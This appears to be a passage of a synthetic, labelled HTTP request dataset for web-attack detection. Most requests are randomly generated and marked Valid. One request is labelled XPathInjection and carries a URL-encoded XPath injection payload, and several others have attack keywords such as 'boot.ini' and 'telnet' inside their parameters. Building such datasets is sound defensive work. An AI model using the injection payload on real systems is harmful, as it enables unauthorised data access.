Accept-Encoding: gzip, deflate;q=0.1, deflate, gzip;q=0.4
Accept-Language: DntK-r, sr7nnai-fen4Tm;q=0.1
Cache-Control: min-fresh=22
Client-ip: 122.67.58.101
Cookie: RHwnodeuZlyo=eNins~eean-c<tal:4o
Cookie2: $Version="416"
Date: Tue, 30 Sep 08 17:17:37 UTC
ETag: "4K2mazPqrLOm65B"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: "1MwpV.LPxdC.m21KXIjh"
If-None-Match: "bZkSgga4XYE2Gs59"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: n3isd braheurh=llinDn26
Range: -69404,-1
Referer: /touletoq/nctxar/en4n/hogrsi.msf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.7 (compatible; kt6gcgs; Unix; xseoex4i9a; iezcseryd; awye4he)
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8272x964
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 486 www.rgnso.shtml:1 "waivD4wgcsuaoDeedtp" "Fri, 12 Feb 10 10:10:14 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41755
Start - Id: 11158
class: Valid
GET /pHxkJ3OsKOXfS-TGH.r/E2nrtdTnqpx/AiyenOe/dEnsn991j5rMahoOerw/e3wup4U/dv6E4dqmvX/jl/EteIeelse/sy8bAVhCRiEIz1Td/qaDPIFOwbnHacMjzA4.mdb?ecopsfaqynBo=%24tRbq&fowdeh=qhGfcvDlG9Ao&fopZoiesfR08=yh&re=fzcR6ciE&h9llmu1Pd=lnn&ceaYa=t9i&2yir=o+e%2Bt&oe5nbyaeoar=7%5C8i&cletHoslo41e=irt&q4H1c=etwPg&yl=msaIteehc HTTP/1.1
Host: 176.47.127.203
Connection: close
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312;q=0.8, hz-gb-2312;q=0.7, cp-936, iso-2022-kr;q=0.0, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5873
Client-ip: 124.3.147.71
Cookie: egltje=tSmssp;4RTgElwfbPtmp=rltrrlyh8otk
Cookie2: $Version="13"
Date: Thu, 08 Jan 04 24:20:00 UTC
ETag: W/"xfNTQooR.4nZTmOj."
Expect: 100-continue
From: daneee@lheneowi.org
If-Modified-Since: Wed, 09 Nov 05 10:14:51 CET
If-Unmodified-Since: Tue, 14 Dec 04 22:50:24 CET
If-Match: *
If-None-Match: "HM30z-L2J9wRkOuy"
If-Range: Sun, 18 Mar 07 24:18:05 CET
Max-Forwards: 1247
MIME-Version: 0.7
Pragma: M1Tr3l='odwtjl'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: eVdnj Ur2Vnth=cgpqdwax
Range: 01809-,9808-,-723
Referer: http://www.i9k77Ria.de/zhEeit/mlIjNNa/fanihsen/oGko/rSdpa2.aspx
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: Ejs5orezw/8.1.7.6.6
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 5.8 197.162.148.7, 1.0 21.38.131.37
Transfer-Encoding: deflate
Upgrade: sma/1.3, wob8L/8.0, olat/7.1, duc/0.2
Warning: 319 57.235.65.0 "jRcg2cbta" "Thu, 02 Apr 09 11:25:24 GMT"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11158
Start - Id: 33320
class: Valid
POST /eii/fIoYGeaPos/2izrdml2mwesis/chchildQOK_Aperlb/eeLbeEeoenhentepneet/RDwxw/eYzoyKY6Sc8NR@7cD/tOpR4630iY.Uvo7orY/rtT/ib/oQugZvkQKxYr/Ji.exe? HTTP/1.1
Content-Length: 143
Content-Language: liEc
Content-Encoding: compress
Content-Location: /lise/r1Hem/uthkhi.tiff
Content-MD5: dWFuZWhnaDNlV21Nc0xsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 03:19:11 UTC
Last-Modified: Thu, 24 Aug 06 24:13:33 GMT
Host: 81.58.85.254:80
Connection: keep-alive
Accept: image/*, application/*;q=0.5
Accept-Charset: koi8-r;q=0.4, x-mac-japanese, windows-1254;q=0.4, iso-8859-4;q=0.4, x-mac-hebrew
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 161.3.132.174
Cookie: -usrH9NH=1680;hragaijic=+yao<9ueumsystem;ao3dAlneauph=23448;ZinsertcMfONM4=mxvfha7mdttrstke;teiwbitnleuts=437317004;oDjek=e en\+ai%muql>
Cookie2: $Version="03"
Date: Fri, 17 Jun 05 04:27:21 GMT
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: 100-continue
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Fri, 22 Apr 05 24:05:37 CET
If-Unmodified-Since: Sun, 26 Dec 04 09:24:07 UTC
If-Match: "IJct.Y7LchC4Q@Pg@Krc"
If-None-Match: *
If-Range: Sat, 13 May 06 14:26:45 CET
Max-Forwards: 77
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Bysqd
Authorization: Digest nonce
Range: 6-,39-,43-
Referer: /8flsah/tcibe/ebmt.rar
TE: deflate
Trailer: Host
User-Agent: hQUguoo http://www.htev.biz
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8624x050
Via: 2.5 www.ocr2o.css, htEduh/0.7 www.lgbpa.js, FTP/6.6 www.dohai7o.js
Transfer-Encoding: identity
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 0152734309
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Z16JBQimgpperlG=eusiopenyohle-&itanitnpmRe=b0include4b4c'l&6i=lftS&anRqluiWjhm=52602&teaw2wshoeseus=Oi boot.ini&QimgsL=26891&sbeWu48znsue=395

End - Id: 33320
Start - Id: 24422
class: Valid
GET /bDg11ULM@k0/dr2F-j5kcW4tDIzCi/cWMHQ39rm0.jpg?he=qQbOJv.aF&yjaex4f6=+eAi9&cta=554&sXDchtpass=Weos&r01objectTIE2eH@K=%267s&7st=16495&tftnff3dl2ctCy=le+au3q&ca=uoviet9&bsfwertdo=o4ARDb2y&y1unnlissnsr=sqewindow.openatoad&g92ssdi=al9nhq9d3isitien&9rc=ada&mcr=joit&dtNPXexecMClbi=281 HTTP/1.0
Host: 248.205.119.20
Connection: erxTnyh
Accept: */*
Accept-Charset: shift_jis;q=0.3, ks_c_5601-1987;q=0.2, iso-8859-1, iso-8859-7, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 197.118.98.197
Cookie: tsanjfxisein=yHiopla55nlN;btsrshteari2ao=at5cissa
Cookie2: $Version="9"
Date: Thu, 22 Apr 10 21:05:44 GMT
ETag: W/"B_gkpUCYk2l3LIWc"
Expect: nsikhqu3
From: EthrCsE2@rztsaatbaT.be
If-Modified-Since: Thu, 01 Jul 04 12:05:49 UTC
If-Unmodified-Since: Thu, 04 Mar 10 08:20:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jun 06 19:11:32 CET
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: lefenl olwpEwk=oter
Range: 5-1785,779-2938,62-7099
Referer: http://tunh5n.net/9eohtnse/tzEuowe.swf
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.4 (compatible; i9tnteoe; Win98; niim0oeeE; haroAushf; paeg)
UA-CPU: StrongARM
UA-Disp: 705,814,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 179x8444
Via: FTP/9.9 www.1lvs.css, 9.4 www.3iO9e.js, 3.6 www.sZsA.shtml:04
Transfer-Encoding: deflate
Upgrade: I3r8es/8.7
Warning: 901 2.195.241.77 "iaii3i" "Fri, 29 May 09 17:59:10 GMT"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24422
Start - Id: 49925
class: XPathInjection
GET /ei2yeae/60j-QDWg/kyiyhrlfsit/4g0./rdoqelhys1f/hes/ntlOtsrEttr/cDd2fS.css?2y4Ndd=146&gPevceedt1A=5036+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++504%3D&Dfiwno=itNrlFea HTTP/1.0
Host: www.4k9tterq.ch
Connection: close
Accept: text/xml;q=0.5, audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-age=43114
Client-ip: 69.149.110.120
Cookie: FU_eXJ=sXMd7p8;gir8aaer=r7ps;ytnzedqeeE7s=nic;rg0=w'h6bnoecka;uYGU=t62ssinS
Cookie2: $Version="5"
Date: Mon, 25 Feb 08 20:20:46 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Mon, 26 May 08 12:55:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.8
Pragma: gci=cj
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: -3
Referer: http://Oosap.cz/tleItps/er2er/lIed74xe/reee.txt
TE: deflate
Trailer: Host
User-Agent: yIanvM
UA-CPU: MIPS
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49925
Start - Id: 18350
class: Valid
GET /quxLBvQ4nph-PgVoS.cgi?gta=hLeD&98md0eCuFdn94=2861656&enhnnjlrbetxcso=sosT&orhua=9 HTTP/1.1
Host: 202.125.87.105:12
Connection: xeeDukat
Accept: */*;q=0.7
Accept-Charset: x-mac-japanese;q=0.0, utf-8, utf-7;q=0.7, iso-8859-3;q=0.5, x-mac-arabic;q=0.8
Accept-Encoding: gzip, identity;q=0.6, identity, deflate, gzip;q=0.9
Accept-Language: futui-rs, i-tievwi;q=0.5, on-g, iortao-e5
Cache-Control: no-cache
Client-ip: 34.195.210.138
Cookie: 0uto8iHli=Iooeairoq;xyem=~;sH8=39017
Cookie2: $Version="1"
Date: Fri, 30 Jun 06 17:52:32 CET
ETag: W/"3KtH72D6imr6Xjschyi"
Expect: 100-continue
From: tehgh57h@ejdoaoe.gov
If-Modified-Since: Sat, 27 Aug 05 21:34:53 CET
If-Unmodified-Since: Mon, 01 Sep 08 23:04:04 GMT
If-Match: *
If-None-Match: "o7Nz_xs-XrHolS6y1"
If-Range: *
Max-Forwards: 182
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: NTLM aDllOHR1c2VtbGllNGVydDhybmluZ3lqZWFvYXRodGV2c2Jh
Range: 14861-5
Referer: http://www.r1neh4ta.fr/ei8a/8eapsa.mp3
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.7 (Windows; U; Windows NT 1.5; an-mm; rv:1.9.5) Gecko/75680509
UA-CPU: x86
UA-Disp: 905,403,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0744x394
Via: 4.6 www.sa31uzb.png
Transfer-Encoding: gzip
Upgrade: bcsem/7.4, pxcsMA/1.4, emwdie/5.8, weMi/4.4
Warning: 161 80.84.210.54:23 "eroOR5hRpwSed" 
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 292738
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18350
Start - Id: 5479
class: Valid
PUT /gRlH9bKd/cN/oIuoiuagi9ctYSsgryUo/d9rtQ6fn.asmx? HTTP/1.1
Content-Length: 98
Content-Language: 4h
Content-Encoding: compress
Content-Location: /cfd8/6ibrnse.bin
Content-MD5: czVsM2VoeWp1aHN5bnRhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 09 18:33:14 CET
Last-Modified: Sat, 28 Oct 06 04:55:54 GMT
Host: www.pDau3b.be
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.4
Accept-Language: lW-Te;q=0.0
Cache-Control: min-fresh=1355
Client-ip: 13.15.222.251
Cookie: suaei=dexd3o0c0ro;sadRcrtOpyhMir=NbiNltr;zstw1riwnu=poo;meeshchaobyn=anprocessing-instructionos;i8dii4lt=r7aqeDXzSwwd;dTiclAr5ZrutoOs=8193555324
Cookie2: $Version="0"
Date: Sun, 28 Oct 07 20:29:12 GMT
ETag: W/"PFIRaV0RmbuwoOK19"
Expect: btrfti0y
From: lczro@ehIntmhe.com
If-Modified-Since: Thu, 24 May 07 07:15:59 UTC
If-Unmodified-Since: Fri, 19 May 06 15:00:52 UTC
If-Match: "F_@hC-30QcnJg83Fur"
If-None-Match: *
If-Range: Thu, 17 Mar 05 13:30:24 GMT
Max-Forwards: 6
MIME-Version: 6.9
Pragma: lctsd=sootf
Proxy-Authorization: Digest nonce
Authorization: dzoqe nhDsn=arfH
Range: -1,49-10
Referer: http://oaqosemi.de/aiepofr.cfm
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.3 (compatible; eftrtnHrr; Solaris; rharuenz; riiL0TyE)
UA-CPU: StrongARM
UA-Disp: 4823,2898,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2642x571
Via: FTP/5.5 57.210.63.46
Transfer-Encoding: compress
Upgrade: aretn/9.6, epderi/1.0, tid/8.8, gctsfR/7.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

gaema6obecpei=3SKWT&itiruwvoecuonI=xyja&a4Rid=5&hQees=184024&eoknrj2waienfsu=479977&tnyu5uh=?all

End - Id: 5479
Start - Id: 14009
class: Valid
GET /oljpeVixdf@pe/s1w3sh.swf?ocdewpsressXzte=uJ0P&rra=0bsj&stdiet=Dldf&EenaH=mornedoiol8nce&wr=03&cleie9nln1=558411 HTTP/1.1
Host: www.a8pnTd.ch:80
Connection: regyyOy4
Accept: */*;q=0.6
Accept-Charset: windows-1250
Accept-Encoding: deflate;q=0.0, compress;q=0.0, identity;q=0.6
Accept-Language: saR-ehg;q=0.0, d-e5c;q=0.8, cas-n3Sum
Cache-Control: no-transform
Client-ip: 134.74.211.38
Cookie: aNngnapsUnyusss=qo nEtall;raWoenKnei8mar=ef);uaos=hb:;lDRTlxidV=79823338;od90ogstr=591
Cookie2: $Version="0"
Date: Fri, 12 Nov 04 14:30:13 UTC
ETag: W/"N0G51K5pUBajmD3E65Xy"
Expect: hbsstpl
From: aeeaqe@ea10ef.st
If-Modified-Since: Sun, 28 May 06 12:07:05 GMT
If-Unmodified-Since: Sat, 19 Apr 08 15:01:00 GMT
If-Match: "cR2Xp4dRowh8uBx"
If-None-Match: "Vbv0NPnXa7jdF6Jc@."
If-Range: Thu, 18 Aug 05 08:42:57 GMT
Max-Forwards: 91
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ooxa Emonh=aeiur
Authorization: Basic eXllbXJ1cjpvdHV5
Range: 986633-,-445,64-7061
Referer: /urotc.mspx
TE: deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: ipiCih/1.6.0.5.0
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 190x1907
Via: 6.3 www.nrom.shtml:59413, 7.6 160.104.179.81
Transfer-Encoding: compress
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 499 www.omnsctsI.jpg "noielrenl" "Fri, 06 Jul 07 24:12:48 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14009
Start - Id: 33978
class: Valid
PUT /NtnOoi6wsnIkee/itc4sihnu9or6rd/at2wrdbu/cN4juxNV.dll? HTTP/1.1
Content-Length: 227
Content-Language: ea,llmrs6mt,cmd
Content-Encoding: identity
Content-Location: http://9sneIa.uk/lpcyq/t4raB/tssiJeag/ewAi/d8odo.js
Content-MD5: Tm5tOXVRbmRBNEEzZWhlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Apr 06 06:59:09 CET
Last-Modified: Fri, 27 Jan 06 16:05:42 UTC
Host: 193.91.134.76
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253, iso-8859-7, koi8-r, windows-1258;q=0.3, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=24
Client-ip: 17.21.144.90
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="3"
Date: Sun, 05 Sep 04 04:36:50 CET
ETag: "_a0_64jbSCr6SnLUs"
Expect: 100-continue
From: 2lttn@aSarnOJ.de
If-Modified-Since: Tue, 16 Feb 10 08:02:01 CET
If-Unmodified-Since: Mon, 08 Aug 05 13:36:37 CET
If-Match: *
If-None-Match: "EfGMSjIZzX_ZY1hAzT"
If-Range: Thu, 20 May 04 07:06:25 UTC
Max-Forwards: 5
MIME-Version: 6.3
Pragma: uUte='kaf93bh'
Proxy-Authorization: Basic Y3RpbGhiaEU6aWdubHRobVI=
Authorization: Digest algorithm=MD5
Range: 7-987,-0542
Referer: /uan7esh/eont6.png
TE: trailers,gzip;q=0.3,deflate
Trailer: Authorization
User-Agent: rsOlsibo7rwn2tgn3gs7
UA-CPU: Sparc
UA-Disp: 370,676,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: waa/7.1 199.148.45.204, ett/9.5 www.823rdb.htm
Transfer-Encoding: deflate
Upgrade: tiy/3.6, xma/2.7, hcenti/3.5
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

cxUrrkaoe=018746705&tIkEenyrhbgnte=oSJQ&h7se4unmr=8&vgsltr=;:r &pie=eziOpozdneaf&oha=Sitief0anemfs\&sasvtw=eSohshI&tott=heeBdexEtmy&ibo=7qhaFLc2e3&nyeadejohR=iBb4pkH3JgMC&ia6wi=0eaf&Ntafpgeo=srS1sd2&edgaetnt=vIQCa@GFf2m

End - Id: 33978
Start - Id: 230
class: Valid
GET /m@pCeO@W@foD39Aml8I4/nmodiiFwrxRmsea.png? HTTP/1.1
Host: 152.135.213.92
Connection: rrcNur
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: stkioOe-s;q=0.9, nled-aHditwoo, Roooot-n;q=0.9
Cache-Control: tda='tns'
Client-ip: 221.16.80.246
Cookie: ohmoa=Rori~lra/nNs ;rm=42
Cookie2: $Version="439"
Date: Thu, 27 Nov 08 18:45:58 GMT
ETag: "isEz1WpfU9Phbh11J1p"
Expect: 100-continue
From: iAtf@e4stsyo3W.ch
If-Modified-Since: Thu, 27 Aug 09 17:55:36 GMT
If-Unmodified-Since: Mon, 09 Aug 04 04:43:29 CET
If-Match: *
If-None-Match: "cXh8rBV@ReQeOMfma.GN"
If-Range: Thu, 26 Jan 06 09:43:36 CET
Max-Forwards: 96
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: Basic dHNhc0UyOmRiMHVvbA==
Range: 46-,9-788359,-8100
Referer: /zeEpu3.php
TE: deflate,deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/0.5 (Windows; U; Windows NT 6.2; sa-Tk; rv:4.4.1) Gecko/56324033
UA-CPU: StrongARM
UA-Disp: 2677,740,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 5.3 www.ghepngin.png, 6.0 16.163.39.67:7877, 8.6 125.137.94.253
Transfer-Encoding: gzip
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 30712495448
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 230
Start - Id: 26310
class: Valid
GET /i_O6L@tzWZbo8mZ_n0I/muleXmWiahoftehi.css?gMqou6Mdaa=d%27ois%5Dh%3Ec+&GWwindow.openg8Y=219&4XAR_=e&T1v._Vh5jtelnetZr=An7%259%3A%5DHpatvhl HTTP/1.0
Host: www.ntUsau.com:8999
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1250, windows-874, x-mac-turkish;q=0.4, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: d7poena-ml;q=0.3, ereeeurm-mvge8, pteierE-taEwqe
Cache-Control: max-age=70
Client-ip: 55.156.173.255
Cookie: wbsoptC1OQI=2831917;oerShiyconihc=Em2btie;2stmo=0Z/s';drs5iarn=4047;pitn3srnsch=iVeWJYT
Cookie2: $Version="39"
Date: Wed, 29 Apr 09 05:08:31 UTC
ETag: "wP.pVv6NkD6cB36Mm"
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sun, 08 Mar 09 23:05:23 CET
If-Unmodified-Since: Fri, 07 Mar 08 16:45:52 CET
If-Match: *
If-None-Match: "VQ0o906Otg3xPYnvlzTf"
If-Range: Sun, 13 Jan 08 09:16:37 GMT
Max-Forwards: 4789
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Adal quAd4eh=bitares
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 2-,592-3402
Referer: /mnEai/tsnb0/ihhiat/Ea1Nove4/6rag7s.msf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.9 (compatible; Konqueror/7.4; Unix; tPi85e; rhjiasn; aaLrxemmk)
UA-CPU: StrongARM
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3902x9522
Via: 7.0 www.bnbCAtua.htm:2083
Transfer-Encoding: compress
Upgrade: r8nst/8.4
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26310
Start - Id: 25219
class: Valid
GET /mzf3KhT0q/Of_.pl?k6idn1psna=nBz_t8&f@Srwhere=fN&3Zhincluder-JLF8D=heu&nenaguntn8o38i=openq2tz%40rtoe4tpme&ehsnsh4fzadt=- HTTP/1.1
Host: www.lCcw.uk
Connection: keep-alive
Accept: video/*, video/*;q=0.3, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=79
Client-ip: 9.21.145.138
Cookie: i5ioa8a3t4Ma=978923;ieNdyis=uPHlG_;I4xaaosfThjeoe7=462
Cookie2: $Version="7"
Date: Wed, 26 May 04 23:03:04 GMT
ETag: W/"9@I4d6_H7UPz_6.aVxtR"
Expect: Eieo7sz
From: xtrtser5@serpd.st
If-Modified-Since: Tue, 04 Dec 07 16:53:47 GMT
If-Unmodified-Since: Sat, 22 Apr 06 05:18:36 GMT
If-Match: "bF4RxVnguYuhaVJp-N"
If-None-Match: "EdZsGS.lG-COp@T51pMR"
If-Range: Tue, 07 Mar 06 07:46:47 CET
Max-Forwards: 7320
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic aHdoc2E6aHQzaVJ2RQ==
Authorization: rthm icdu=lp1Ayatd
Range: -18637,7-
Referer: /tntWE1l.shtml
TE: trailers,gzip;q=0.8,chunked;q=0.2
Trailer: Accept
User-Agent: tdge/6.8.9.0.2
UA-CPU: x86
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 386x0963
Via: FTP/1.0 www.enwaore.shtml
Transfer-Encoding: iswaa
Upgrade: rrtpr/5.4
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 223.126.236.126
X-Serial-Number: 39906730696975900354
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25219
Start - Id: 20241
class: Valid
GET /bW6Npmo/1treoes8e/deYM/lrmecoyooye/rJL2jH-3OKcTY1/andAtKIuxRmDW3vxE/wjJ-xN0..RrNgqtfotCe.css?2intbin=9a+dcaBRHno&desrae7=%3AI&r2=88808950 HTTP/1.1
Host: www.r3Zds.be
Connection: keep-alive
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yeoamrl-ooefpobw, 73t-Arhbt;q=0.8
Cache-Control: no-cache
Client-ip: 201.167.4.78
Cookie: mtthlFeOtndA=oons7HOewae8opa
Cookie2: $Version="38"
Date: Thu, 22 Oct 09 06:55:31 UTC
ETag: "onTczYYYLkfLSl06wg"
Expect: rtd6qe7=sudec4t
From: netyzah@uidoqet.be
If-Modified-Since: Tue, 10 Feb 04 02:07:36 CET
If-Unmodified-Since: Mon, 19 Jan 04 03:56:29 GMT
If-Match: "lXp4yVNeocat1tAZ6Yaa"
If-None-Match: "li8SvchLCuDWpB0B2as"
If-Range: "2Bv3JnUi8cAKX-ywL"
Max-Forwards: 17
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aGhqb3NydGVobjZhdFhBMW90ZGtydDNyMmNFb2liSW5idG9uYUF5YmVjb2Vo
Authorization: Digest username="9otn"
Range: 58959-,-0873,-2
Referer: http://tpsanfss.de/4t71t0yr/pnteIe/Trqtgzch.txt
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.3 (compatible; MSIE 4.6; Unix; wFtLrjsaie; pawecacoV)
UA-CPU: MIPS
UA-Disp: 4571,1363,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 566x725
Via: HTTP/9.4 www.oAia4ojc.tiff:64
Transfer-Encoding: identity
Upgrade: tfee0/6.7, 0Reo/7.6
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 554046996797250
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20241
Start - Id: 7971
class: Valid
POST /utiasuIhehtehn/9d9ptheuhi/OefhsOsi8zi0eaghMI/n2I@GPz4U43X8U-U/hT6qMOh1XL1-r1qp7/iirne/fG-7v6nF71vH5/GkPZC/ogC3C.tHj/CHx/uORxseq.nsf? HTTP/1.0
Content-Length: 96
Content-Language: se
Content-Encoding: compress
Content-Location: http://vrbii6cd.it/hdfne.php3
Content-MD5: Z2RxTm5lN2FlcnQ3UXVFbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jul 06 18:45:21 GMT
Last-Modified: Fri, 23 Dec 05 02:56:43 CET
Host: 218.220.172.175
Connection: close
Accept: video/quicktime
Accept-Charset: euc-jp
Accept-Encoding: 
Accept-Language: giLr-slrssntu;q=0.5, agh-ms;q=0.2, foF3-rPnrgse
Cache-Control: only-if-cached
Client-ip: 163.108.182.17
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="50"
Date: Sat, 11 Apr 09 03:27:12 CET
ETag: "48bdU5dR6znX_hvh0Dm0"
Expect: ta4ibo1g
From: eedf0au@eYilizod8t.de
If-Modified-Since: Thu, 08 Jan 04 17:33:03 CET
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: "E@CeRKIdnKoyNa6n"
If-Range: "bO4smO9q_DIDByPWQFr"
Max-Forwards: 64
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -607
